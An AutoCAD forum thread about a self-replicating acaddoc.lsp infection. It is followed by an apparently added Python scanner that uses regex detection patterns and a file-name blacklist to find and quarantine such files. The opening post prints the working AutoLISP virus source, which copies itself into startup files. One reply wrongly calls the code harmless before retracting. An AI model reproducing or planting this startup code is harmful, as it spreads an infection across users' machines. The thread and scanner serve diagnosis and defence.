Visual LISP, AutoLISP and General Customization
Acaddoc.lsp virus?

Message 1 of 15
robertz
22674 Views, 14 Replies


I'm trying to determine whether the Acaddoc.lsp files that I'm finding in many of our working folders are malicious.  Nothing appears to be going wrong with opening files, working on them, saving them, etc., but I'm seeing the LSP files appearing in many of our folders and I'm not sure if I should take action to remove/cleanse them.  Please let me know if you have any advice about this.  We're using AutoCAD MEP.  Here is what I'm seeing inside the LSP file when I use Notepad to look at it:


(setvar "LAYEREVAL" 0)
(setvar "LAYERNOTIFY" 0)
(defun-q s::startup
(/ basepath
baseacad
acaddocpath
r-acaddoc
w-basepath
rl-acaddoc
acaddoclsp
c-acaddocname
c-acaddocpath
c-acaddoc
)
(setq basepath
(findfile "base.dcl")
)
(setq basepath
(substr basepath
1 (- (strlen basepath) 8)
)
)
(setq baseacad (strcat basepath "acaddoc.lsp"))

(setq acaddocpath
(findfile "acaddoc.lsp")
)
(setq acaddocpath
(substr acaddocpath
1 (- (strlen acaddocpath) 11)
)
)
(setq acaddoclsp
(strcat acaddocpath "acaddoc.lsp"))


(setq c-acaddocname
(getvar "dwgname")
)
(setq c-acaddocpath
(findfile c-acaddocname)
)
(setq c-acaddocpath
(substr c-acaddocpath
1 (- (strlen c-acaddocpath) (strlen c-acaddocname))
)
)
(setq c-acaddoc
(strcat c-acaddocpath "acaddoc.lsp")
)
(if
(and
(/= basepath acaddocpath)
(= c-acaddocpath acaddocpath)
)
(progn
(setq r-acaddoc
(open acaddoclsp "r")
)
(setq w-basepath
(open baseacad "w")
)
(while
(setq rl-acaddoc
(read-line r-acaddoc)
)
(write-line rl-acaddoc w-basepath)
)
(close w-basepath)
(close r-acaddoc)

)

(progn
(setq r-acaddoc
(open acaddoclsp "r")
)
(setq w-basepath
(open c-acaddoc "w")
)
(while
(setq rl-acaddoc
(read-line r-acaddoc)
)
(write-line rl-acaddoc w-basepath)
)
(close w-basepath)
(close r-acaddoc)

)
)
(princ)
)
(setvar "cmdecho" 0)(terpri)(command ".-scalelistedit")(command "reset")(command "yes")(command
"exit")
(setvar "LAYEREVAL" 0)
(setvar "LAYERNOTIFY" 0)

Message 2 of 15
pendean
in reply to: robertz
Message 3 of 15
skintsubby
in reply to: pendean

And this helps to explain a bit about it and what Autodesk have done to stop it.


http://adndevblog.typepad.com/autocad/2013/07/all-you-need-to-know-about-autocad-secureload-au.html:...

Message 4 of 15
Anonymous
in reply to: skintsubby

Aw,

the link skintsubby posted does not work...

Message 5 of 15
skintsubby
in reply to: Anonymous
Message 6 of 15
Anonymous
in reply to: robertz

., but I'm seeing the LSP files appearing in many of our folders and I'm not sure if I should take action to remove/cleanse them.  


Some portions of the code in that startup routine don't appear as if they're doing anything malicious.

But they are employing the (read-file) and (write-file) functions....this conditional here...


(if
(and
(/= basepath acaddocpath)
(= c-acaddocpath acaddocpath)
)
(progn
(setq r-acaddoc
(open acaddoclsp "r")
)
(setq w-basepath
(open baseacad "w")
)
(while
(setq rl-acaddoc
(read-line r-acaddoc)
)
(write-line rl-acaddoc w-basepath)
)
(close w-basepath)
(close r-acaddoc)


Maybe that's what's causing the text files to appear on your machines. It looks to me as if it's storing some paths (that may be different for each user executing this script) and then writing some text to those files before closing them.

I wouldn't worry too much, and if you're able to locate and open one of these text files, if it is NOT required you may try to comment out the appropriate lines from the script in order to have it not read/write anymore.

You'd do that with the semicolon ";" in front of each of the lines....

To clean your system you could do a search for the .txt filenames and remove them, then comment out the lines that are creating them....

It doesn't appear as if that script is doing anything major but you may want to get confirmation of this...

I can't tell exactly what it does and I may be incorrect about it not being malicious, but from looking at the functions being employed, nothing seems too harmful at all. No Windows registry calls are being made, nor is it compiled...I wouldn't worry too much about it; if the files it's placing on your system are getting annoying then just force it to stop writing them....

Also the environment settings...the 2 setvars being operated at the beginning and end are setting to the same value without storing the users previous settings nor making calls to layer anything during the routine. This likely seems like one users preferences and a method for storing some information from the drawing (my best guess at what the intention of this code is).

Just know that the files are appearing because the code is telling them to make them, and that it's easily removed. Nothing too vital is occurring, but you always want to use ";" in favor of outright deleting, because you can remove the ";" if anything goes unexpectedly.

Hope this helps some

Message 7 of 15
dgorsman
in reply to: Anonymous

This is standard malicious code procedure.  It opens the auto-running AutoCAD code files and appends additional code so that it replicates.  NOTHING SHOULD BE READING OR WRITING AUTOMATICALLY TO ACAD.LSP OR ACADDOC.LSP.


For the OP: yes, you have an infection.  It needs to be fixed on ALL AutoCAD computers in your organization.  NO EXCEPTIONS OR IT WILL KEEP COMING BACK.

----------------------------------
If you are going to fly by the seat of your pants, expect friction burns.
"I don't know" is the beginning of knowledge, not the end.


Message 8 of 15
Anonymous
in reply to: robertz

learn something new...every day
Message 9 of 15
BlackBox_
in reply to: dgorsman


@dgorsman wrote:

This is standard malicious code procedure.  It opens the auto-running AutoCAD code files and appends additional code so that it replicates.  NOTHING SHOULD BE READING OR WRITING AUTOMATICALLY TO ACAD.LSP OR ACADDOC.LSP.


For the OP: yes, you have an infection.  It needs to be fixed on ALL AutoCAD computers in your organization.  NO EXCEPTIONS OR IT WILL KEEP COMING BACK.


As a result of this very issue about a year ago, I developed a .NET plug-in which loads user-defined 'virus definitions' from an XML file, which are then used iteratively to search SFSP, etc. for prior to any Acad* file(s) being loaded in the startup sequence. If any are found, the file is rendered inert (by renaming in place), and then another search for same 'definition' is performed (to ensure no duplicates are left behind for completeness). Any definition found is also reported at the command line, including the file's owner, so as to help track down the cause.


I submitted this app to Exchange during AutoCAD 2014 Beta, only for app review to be held up due to Autodesk's Security protocol being rolled out (which I was unaware of prior to Beta).


My app reviewed well (when they got to it), but they wanted me to remove user-defined definitions, which I categorically rejected. We do not use compiled LISP code files, so I could add a blanket *.FAS, and *.VLX definition, whereas other users may not... I wanted to give the user flexibility.


They also wanted me to first compile a list of all 'virus' file names, hard-code them into the app, and then host them on my website, so as to use the new JavaScript API to perform live updates... It took multiple tries to get them to understand that it would be a bad thing to hard-code Acad.[lsp[fas[vlx]]], and AcadDoc.[lsp[fas[vlx]]], etc. and block them without user's ability to override.


Lastly, they didn't care for my app being named 'Antivirus for AutoCAD' (like I said, I was unaware of AutoCAD Security at the time), so I chose to rename it as 'Blacklist for AutoCAD'... I use the app daily for my work, but after the frustration experienced on my first app submission, I've let it sit... it needs some TLC to implement a UI so user doesn't have to manually edit the XML, etc..


This post reminds me that I should get this finished, as it would help several folks... Especially those using 2012 and earlier, as I do.



"How we think determines what we do, and what we do determines what we get."

Message 10 of 15
Anonymous
in reply to: BlackBox_

Interesting.

I'm glad this came up and will be careful to not employ anything that reads and writes to the acad* lsp files, as dgorsman stated, as a result of this newfound knowledge. Sorry for my incorrect info if the OP read it before dgorsman's and BB's. I assumed that malicious code would be compiled and not employ innocuous-looking statements, but the word 'replicate' makes it easily understandable as to where the maliciousness comes from.

Message 11 of 15
dgorsman
in reply to: Anonymous

The source of the virus is usually piggybacking in on an infected file.  Sometimes it comes in via one of those modified ACAD.LSP or ACADDOC.LSP files along with drawing files, where the sender is unaware of what they do.  From there it tries to modify the appropriate file(s) to add instructions to create itself elsewhere.  Some of them use ASCII character codes to try to mask what is being added.


In all cases I would be wary of something that tries to dynamically open LISP files and write more content to them.  The general concept is kind of cool - self-modifying code can do some very neat things.  When it's done to files that are loaded and executed automatically, that waves a big red flag.

Message 12 of 15
robertz
in reply to: robertz

I appreciate everyone's input.  I'd like to clean the infection from our system but I'm having trouble finding a reliable procedure for it.  I did check out the links provided so far, but it seems like the only actual infection-cleaning procedures they offer are related to a .VLX infection (which doesn't seem to match my circumstances) or rely on security features offered only in 2013 or 2014 (which won't help me since we're running older versions of AutoCAD MEP on most of our workstations).  There is a potential solution on a random blog that I stumbled across when searching for fixes (http://metinsaylan.com/819/how-to-clean-acaddoc-lsp-virus-from-your-pc/), but it uses a self-executable that I'm not sure I should trust.  If anyone has used that self-executable and knows it's dependable, please let me know.  Can anyone point me to a procedure for getting rid of this self-spreading acaddoc.lsp?  I assume there will be more to it than just deleting acaddoc.lsp from our working directories and individual CAD workstations.


By the way, if it helps to clarify my specific situation, the only symptoms thus far is the replicating acaddoc.lsp file in every folder where we open a CAD drawing.  Other than that, we have seen no malicious effects such as files that won't open, bizarre error messages, etc.  I look forward to getting rid of this before worse symptoms arise.  Thanks, everyone, for all of your helpful contributions so far.

Message 13 of 15
Anonymous
in reply to: robertz

Well, you could do a hard search in your computer drive for ".lsp" and then do a find in each file found for one of the strings found in your malicious code above. Quarantine each of these files, remove them....make sure the ones that are being used by AutoCAD are replaced with non-infectious lisp and see if you're able to run AutoCAD without it spreading?

Just a suggestion....obviously you may learn more pertinent information from more experienced users here such as dgorsman, but if you're at a loss as to what to do.....I'd start there.

Establish controls....keep the search window open and pay attention to the quantity of lisp files returned by the search....check to see how many additional lisp files are created if you run AutoCAD...remove infected code from infected lsp files....rinse and repeat..that may get you in a better spot.

hth
Message 14 of 15
stevor
in reply to: robertz

My guess is that any VLX or FAS file can contain malware; so trust what you make, and know that the Autodesk ones are real. Also, there is a method of loading a virus from a LSP; as done by the BURST virus, of various names and forms, where a list of two integer numbers are used to load the virus code. One example: http://usa.autodesk.com/adsk/servlet/ps/dl/item?siteID=123112&id=13717811&linkID=9240617
S
Message 15 of 15
dgorsman
in reply to: Anonymous

Not just LSP files; there's also VLX, FAS, and MNL.  In fact, the extension doesn't matter much - you can rename a LSP file as .XXX and it will still load.  Start with everything named "acad" - those are typically the ones automatically loaded at start-up.  Investigate any add-ins, downloads, or other "stuff" downloaded by users who think they are helping.


Automated removal of these files is tricky.  Unless you do it absolutely right there's a false sense of security, since it can miss something it isn't looking for.  Best bet: find the original source and apply steps to deal with that rather than the symptoms.

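To make the triage advice in this thread concrete, here is an added example (my own code, not anything posted by robertz, dgorsman or BlackBox_, and not BlackBox_'s plug-in). It puts together three points raised above: dgorsman's observation that anything named "acad*" is a startup file regardless of extension and that nothing legitimate should write into acad.lsp/acaddoc.lsp; BlackBox_'s approach of a user-defined definition list, rendering hits inert by renaming in place and then re-scanning so nothing is left behind; and the suggestion to search the drive and grep each LISP file for the replication strings. The scan walks a folder tree (assumed to be your project share or a workstation), scores auto-load files for the replication pattern (an `s::startup` hook that finds acaddoc.lsp, opens another file for writing and `write-line`s into it), and flags blacklisted names. The `.quarantined` suffix, the definition names, the score threshold and the sample files are all my assumptions; the "replicator" sample is a constructed, non-functional fragment that only contains the indicator strings.

```python
"""Triage scanner for self-replicating acaddoc.lsp-style startup files.

Added example for the thread above; not the forum's or Autodesk's code.
Threshold, definition list and quarantine suffix are assumptions.
"""
import os
import re
import tempfile
from dataclasses import dataclass, field
from pathlib import Path
from typing import List, Optional, Union

# Stems AutoCAD loads automatically.  Every extension is checked, because a
# renamed LSP file (e.g. acaddoc.xxx) still loads if something points at it.
AUTOLOAD_STEMS = {"acad", "acaddoc"}
# Constructed blacklist in the spirit of BlackBox_'s XML definitions: exact
# names this (hypothetical) shop never ships, so their presence is a finding.
DEFINITION_NAMES = {"acad.fas", "acaddoc.fas", "acad.vlx", "acaddoc.vlx"}
FLAG_THRESHOLD = 3  # how many indicators must co-occur before a file is flagged

# Replication indicators seen in the sample posted in Message 1.  One alone is
# not proof (plenty of legitimate code opens a file for writing); the
# combination inside an auto-loaded file is what dgorsman calls the red flag.
INDICATORS = [
    (re.compile(r'\(defun-q\s+s::startup', re.I), "defines s::startup (runs on every drawing open)"),
    (re.compile(r'\(findfile\s+"acaddoc\.lsp"', re.I), "locates acaddoc.lsp on the search path"),
    (re.compile(r'\(strcat\s+\S+\s+"acaddoc\.lsp"', re.I), "builds an acaddoc.lsp path in another folder"),
    (re.compile(r'\(open\s+\S+\s+"w"', re.I), "opens a file for writing"),
    (re.compile(r'\(write-line\b', re.I), "writes lines into the opened file"),
]


@dataclass
class Finding:
    path: Path
    reasons: List[str] = field(default_factory=list)


def is_autoload_candidate(name: str) -> bool:
    """True for acad.* / acaddoc.* with any extension (case-insensitive)."""
    return Path(name).stem.lower() in AUTOLOAD_STEMS


def assess(path: Union[str, Path], text: str) -> Optional[Finding]:
    """Judge one file from its name and contents; None means nothing to report."""
    path = Path(path)
    reasons: List[str] = []
    if path.name.lower() in DEFINITION_NAMES:
        reasons.append("file name matches a blacklist definition")
    if is_autoload_candidate(path.name):
        hits = [why for rx, why in INDICATORS if rx.search(text)]
        if len(hits) >= FLAG_THRESHOLD:
            reasons.extend(hits)
    return Finding(path, reasons) if reasons else None


def scan(root: Path) -> List[Finding]:
    """Walk root and return findings for every auto-load or blacklisted file."""
    findings: List[Finding] = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not (is_autoload_candidate(fname) or fname.lower() in DEFINITION_NAMES):
                continue
            p = Path(dirpath) / fname
            try:
                text = p.read_text(errors="replace")  # compiled FAS/VLX is binary; name check still applies
            except OSError:
                continue
            f = assess(p, text)
            if f:
                findings.append(f)
    return findings


def quarantine(finding: Finding) -> Path:
    """Render the file inert by renaming it in place (suffix is this example's choice)."""
    target = finding.path.with_name(finding.path.name + ".quarantined")
    os.replace(finding.path, target)
    return target


# Constructed samples.  The first only carries the indicator strings from the
# thread's sample; it is deliberately not runnable AutoLISP.
REPLICATOR_FRAGMENT = """(defun-q s::startup (/ basepath)
(setq basepath (findfile "acaddoc.lsp"))
(setq baseacad (strcat basepath "acaddoc.lsp"))
(setq w-basepath (open baseacad "w"))
(write-line rl-acaddoc w-basepath)
"""
BENIGN_STARTUP = """;; company startup: load our tools and quiet the command line
(setvar "cmdecho" 0)
(load "company-tools.lsp")
(princ)
"""


def demo() -> dict:
    """Build a throwaway folder tree, scan it, quarantine hits, re-scan."""
    root = Path(tempfile.mkdtemp(prefix="acadscan-"))
    for d in ("ProjectA", "ProjectB", "Support"):
        (root / d).mkdir()
    (root / "ProjectA" / "acaddoc.lsp").write_text(REPLICATOR_FRAGMENT)
    (root / "ProjectB" / "acaddoc.lsp").write_text(REPLICATOR_FRAGMENT)
    (root / "ProjectB" / "acaddoc.xxx").write_text(REPLICATOR_FRAGMENT)  # renamed copy still counts
    (root / "Support" / "acaddoc.lsp").write_text(BENIGN_STARTUP)       # legitimate startup file
    (root / "Support" / "acad.vlx").write_bytes(b"\x00constructed-binary")  # hits the definition list
    before = scan(root)
    renamed = [quarantine(f) for f in before]
    after = scan(root)  # BlackBox_'s re-search: nothing should remain
    return {"flagged": sorted(f.path.relative_to(root).as_posix() for f in before),
            "renamed": len(renamed), "remaining": len(after)}


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Run it against a real share by calling `scan(Path(r"\\server\projects"))` and reviewing the reasons before quarantining anything; the benign Support/acaddoc.lsp in the demo shows why the threshold matters, and, as dgorsman notes, a clean scan only removes the symptom until the source that keeps dropping the file is found.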